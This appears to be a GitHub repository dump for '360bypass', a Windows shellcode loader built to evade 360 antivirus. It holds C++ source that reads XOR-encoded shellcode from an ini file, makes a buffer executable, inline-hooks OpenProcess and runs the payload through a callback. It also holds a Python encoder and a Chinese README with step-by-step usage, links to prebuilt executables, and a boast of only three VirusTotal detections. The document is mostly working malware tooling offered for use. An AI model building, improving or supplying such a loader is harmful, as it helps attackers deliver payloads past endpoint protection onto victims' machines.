├── PassAv.cpp
├── PassAv_x64.exe
├── PassAv_x86.exe
├── README.md
├── encode.py
├── finish.png
└── finish2.png


/PassAv.cpp:
--------------------------------------------------------------------------------
 1 | #pragma comment(linker, "/subsystem:windows /entry:mainCRTStartup" )
 2 | #define _CRT_SECURE_NO_DEPRECATE
 3 | #include <Windows.h>
 4 | #include <iostream>
 5 | 
 6 | using namespace std;
 7 | 
 8 | typedef BOOL(WINAPI* Write)(
 9 | 	HANDLE		hprocess,
10 | 	LPVOID		BaseAddr,
11 | 	LPCVOID		BUffer,
12 | 	SIZE_T		Size,
13 | 	SIZE_T*		NumberOfBytes
14 | 	);
15 | Write Writer = (Write)GetProcAddress(
16 | 	GetModuleHandleA("Kernel32.dll"),
17 | 	"WriteProcessMemory"
18 | );
19 | 
20 | typedef BOOL(WINAPI* vp)(
21 | 	LPVOID		Address,
22 | 	DWORD		size,
23 | 	DWORD		New,
24 | 	PDWORD		Old
25 | 	);
26 | vp vip = (vp)GetProcAddress(
27 | 	GetModuleHandleA("Kernel32.dll"),
28 | 	"VirtualProtect"
29 | );
30 | 
31 | class InLine {
32 | 
33 | private:
34 | 	BYTE Newbyte[5] = "0";
35 | 	PROC FuncAddr;
36 | 	PROC hookFunc;
37 | public:
38 | 	InLine(PROC Func);
39 | };
40 | 
41 | InLine::InLine(PROC Func) {
42 | 	FuncAddr = Func;
43 | 	if (FuncAddr == NULL) {
44 | 		exit(1);
45 | 	}
46 | 	hookFunc = GetProcAddress(
47 | 		GetModuleHandleA("Kernel32.dll"),
48 | 		"OpenProcess"
49 | 	);
50 | 	if (hookFunc == NULL) {
51 | 		exit(1);
52 | 	}
53 | 	SIZE_T d;
54 | 	Newbyte[0] = '\xE9';
55 | 	*(DWORD*)(Newbyte + 1) = (DWORD)FuncAddr - (DWORD)hookFunc - 5;
56 | 
57 | 	Writer(GetCurrentProcess(), hookFunc, Newbyte, 5, &d);
58 | 
59 | 	EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)hookFunc, LGRPID_INSTALLED, NULL);
60 | }
61 | 
62 | 
63 | int main() {
64 | 	cout << 123;
65 | 	char path[MAX_PATH];
66 | 	char abc[3000];
67 | 	unsigned char cba[3000];
68 | 	DWORD d;
69 | 	vip(cba, sizeof(cba), PAGE_EXECUTE_READWRITE, &d);
70 | 
71 | 	GetCurrentDirectoryA(MAX_PATH, path);
72 | 	
73 | 	strcat(path, "\\sc.ini");
74 | 
75 | 	for (int i = 0; i < 3000; i++) {
76 | 		_itoa_s(i, abc, 10);
77 | 		UINT ok = GetPrivateProfileIntA("key", abc, NULL, path);
78 | 		if (ok == 0) {
79 | 			break;
80 | 		}
81 | 		cba[i] = ok^1024;
82 | 	}
83 | 	InLine I((PROC)&cba);
84 | 	return 0;
85 | }


--------------------------------------------------------------------------------
/PassAv_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/PassAv_x64.exe


--------------------------------------------------------------------------------
/PassAv_x86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/PassAv_x86.exe


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 360bypass
 2 | 利用inline hook免杀绕过360，vt爆3个
 3 | 
 4 | 使用说明
 5 | 本工具文章地址https://forum.butian.net/share/1824 (审核通过后即可看到)
 6 | 
 7 | 1.把shellcode放到encode.py这个文件里(有注释的那个变量)
 8 | 2.随后把cpp编译成exe
 9 | 3.把生成的ini文件和exe文件放在同一个目录运行既可
10 | 
11 | 4.在命令行使用的时候，需要cd到exe和sc.ini文件所在的目录，不然无法上线!!!
12 | 
13 | 
14 | 5.本项目中的PassAv_x86.exe和PassAv_x64.exe是因为有些师傅编译失败，我把编译好的发出来
15 | 
16 | 免杀效果如下图
17 | ![a](https://github.com/wz-wsl/360bypass/blob/main/finish.png)
18 | ![b](https://github.com/wz-wsl/360bypass/blob/main/finish2.png)
19 | 


--------------------------------------------------------------------------------
/encode.py:
--------------------------------------------------------------------------------
 1 | print(" _")
 2 | print("| |__  _   _ _ __   __ _ ___ ___")
 3 | print("| '_ \| | | | '_ \ / _` / __/ __|")
 4 | print("| |_) | |_| | |_) | (_| \__ \__ \\")
 5 | print("|_.__/ \__, | .__/ \__,_|___/___/")
 6 | print("       |___/|_|")
 7 | 
 8 | shellcode_=b""#put shellcode here
 9 | shellcode=[]
10 | for i in shellcode_:
11 |     shellcode.append(str(i^1024))
12 | shellcode=",".join(shellcode).split(",")
13 | file=open("sc.ini","w")
14 | file.write("[key]\n")
15 | n=0
16 | for i in shellcode:
17 |     file.write(f"{n}={i}\n")
18 |     n+=1
19 | file.close()
20 | 
21 | 


--------------------------------------------------------------------------------
/finish.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/finish.png


--------------------------------------------------------------------------------
/finish2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/finish2.png


--------------------------------------------------------------------------------